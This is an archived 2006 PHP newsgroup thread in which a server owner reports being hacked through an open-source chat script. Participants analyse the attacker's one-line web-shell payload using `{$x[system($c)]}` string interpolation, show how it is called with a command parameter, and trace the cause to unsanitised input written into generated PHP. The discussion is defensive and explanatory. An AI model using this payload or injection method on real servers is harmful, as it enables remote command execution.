Hacked with system()

**Tim Martin** · Sep 5 '06, 10:35 AM

Re: Hacked with system()

Oski wrote:

our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)
>
This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):
>
<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>
>
save these lines as e.g. /sys.php and call it with your browser:

http://localhost/sys.php?c=ls

and you can execute any system command and see the results!
>
But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c) " then I understood.

If you write
$a = "{$x['key']}";

then $a gets the value $x['key'] as expected.

$a = $x[system($c)];

then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).

It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.

I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.

Tim

**Tim Martin** · Sep 5 '06, 10:55 AM

Re: Hacked with system()

Tim Martin wrote:

Oski wrote:
>

>our server got hacked through a security hole in an open source php
>chat script.
>(nothing new so far, ok!)
>>
>This chat script allowed the user to create a new php script on our
>server, with the following content: (the code between the two "..."
>from the hacker):
>>
><?
> $name = "{$x[system($c)]}";
> // some more lines ommitted ...
>?>
>>
>save these lines as e.g. /sys.php and call it with your browser:
>http://localhost/sys.php?c=ls
>and you can execute any system command and see the results!
>>
>But: How does it work? The content of a variable being executed and
>written to the browser?
>If it were just "system($c) " then I understood.

>
If you write
$a = "{$x['key']}";
>
then $a gets the value $x['key'] as expected.
>
$a = $x[system($c)];
>
then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).
>
It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.
>
I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.

Following up to myself, I should note that this is not as big an issue
as it seems on the surface - it only matters if the malicious user
writes the string literal itself. If they control a variable that is
substituted into the string literal, it isn't a problem. e.g.

$intermediate = "system($c) "; // Set by malicious user from a form input
// or some other non-string-literal

$a = "{$x[$intermediate]}"; // This code written by you, not under the
// control of the malicious user

is fine.

Tim

**Sandman** · Sep 5 '06, 11:05 AM

Re: Hacked with system()

In article <1157450070.312 008.144490@m79g 2000cwm.googleg roups.com>,
"Oski" <oski@gmx.dewro te:

Hello,
>
our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)
>
This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):
>
<?
$name = "{$x[system($c)]}";
// some more lines ommitted ...
?>
>
save these lines as e.g. /sys.php and call it with your browser:

http://localhost/sys.php?c=ls

and you can execute any system command and see the results!
>
But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c) " then I understood.

Well, it's odd. system() returns the last line of output if
successful. But in this case, $name is set to the value of $x where
the key is the last line of the ouput. Is there any $x declaration in
the script?

For instance, this:

<?
$x["var"] = "foobar";
$c = "ls";
$name = "{$x[system($c)]}";
print "Value: $name";
?>

Outpus, after a long list of directories in my root directorie (where
'var' is the last):

Value: foobar

So, "var" is the last directory in the ls listing. And the value of
$x["var"] is "foobar", which is assigned to $name.

Why? I have no idea. I'd have top see the entire script for that.

--
Sandman[.net]

**Guest** · Sep 5 '06, 11:15 AM

Re: Hacked with system()

our server got hacked through a security hole in an open source php

chat script.

Which one?

Regards,
Talthen

**Oski** · Sep 5 '06, 11:35 AM

Re: Hacked with system()

Sandman wrote:

Why? I have no idea. I'd have top see the entire script for that.

There is no more script, no more than what was posted by me! The other
lines (mentioned as ommitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.

Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...

Ingo.

**Sandman** · Sep 5 '06, 12:15 PM

Re: Hacked with system()

In article <1157456510.333 540.78430@m73g2 000cwd.googlegr oups.com>,
"Oski" <oski@gmx.dewro te:

Sandman wrote:
>

Why? I have no idea. I'd have top see the entire script for that.

>
There is no more script, no more than what was posted by me! The other
lines (mentioned as ommitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.
>
Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...

Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.

I've been "hacked" this was also, so I've seen some of these scripts.

--
Sandman[.net]

**Robin** · Sep 5 '06, 12:25 PM

Re: Hacked with system()

Oski wrote:

This chat script allowed the user to create a new php script on our
server, [snip]

Surely this is the security hole rather than the script created.
Allowing anyone to write php code that will run on your server is a
Really Bad Idea (tm).

Robin

**Oski** · Sep 5 '06, 12:35 PM

Re: Hacked with system()

Sandman wrote:

Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.
>
I've been "hacked" this was also, so I've seen some of these scripts.

In this case, the chat script asks for your name and email when
registering.
Then, it creates a php-script (as described in my first post) and
creates lines within it:
$name = "<userinput >";
$email = "<userinput _2";
// and so on ...
So you just have to know where this php script is created/saved and
register with a tampered name and then call this php script with the
desired URL + encoded command strings, like "?c=ls%20-l" etc.

Of course, the real (huuuge!) security hole is creating a php script
with unchecked userinput. (I don't dare to guess what might happen if
you have disabled magic_quotes).

But I could not explain the behaviour of PHP as well, especially as
there is nothing documented about this "feature" to execute code within
a variable assignment.

Ingo

Hacked with system()

Hacked with system()

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment